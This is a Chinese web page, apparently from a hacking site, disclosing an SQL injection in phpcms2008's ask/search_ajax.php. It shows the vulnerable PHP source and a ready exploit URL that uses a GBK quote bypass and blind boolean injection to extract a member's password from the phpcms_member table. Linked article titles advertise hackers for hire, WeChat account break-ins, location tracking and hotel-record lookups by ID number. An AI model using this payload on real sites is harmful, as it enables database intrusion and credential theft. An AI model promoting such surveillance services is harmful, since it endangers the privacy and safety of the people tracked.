phpcms2008-0day ask/search_ajax.php
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="3865-e914-4411-4b16 c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试 *** :
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
相关文章
微信同步监控 看完我就后悔了
微信同步监控 看完我就后悔了,微信官方回复:微信不留存任何用户的聊天记录,聊天内容只存储在用户的手机、电脑等终端设备上; 微信不会将用户的任何聊天内容用于大数据分析; 因微信不存储、不分析用户聊天...
疯狂想你的人才会有这些小动作 操作方法和技巧
每个人似乎都擅长的一件事就是欺骗自己,特别是当我们真的爱一个人的时候。 疯狂想你的人才会有这些小动作 1.我们总是因为自己的各种想法,导致不愿意承认自己真实的想法,显然他们的心很清楚自己有多爱这种...
黑客教你定位微信地址(黑客是怎么查看别人位置的)_黑客
黑客教你定位微信地址(黑客是怎么查看别人位置的),8月2日,张姑娘接到几个身边的人的电话。她上前问张姑娘为甚么不还钱。这让张姑娘烦闷,为甚么她自称要钱而不向他们要钱。 黑客教你定位微信地址 1.经...
查住宿信息需要什么级别的权限_身份证查住宿信息
查住宿信息需要什么级别的权限_身份证查住宿信息 最近几年这人工AI都在不断的进步,从前几年击败了人类围棋高手的阿尔法狗到现如今层出不穷的机器人可谓是发展飞速了。现如今又一样黑科技出来了,那就是能够去...
黑客业务受理中心 24小时接单的黑客_黑客
天津滨海新区公安局有一批特警,他们像医生一样守卫着公安网络的安全,而黑客,为公安网络建立了强大的免疫系统和疾病控制监控,诊断和治疗网络病毒和安全问题。近日,“法制日报”记者深入天津滨海新区公安局科技情...
黑客通过微信号获取个人信息(如何黑客进别人的微信)_黑客
黑客通过微信号获取个人信息(如何黑客进别人的微信),即日,广州市公安部分启动了“净网十一号”工程。在微信团队的合营下,胜利打掉了一个建造、倒卖、应用微信外挂应用,从事微信账号业务和号码保护的新式超大型...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!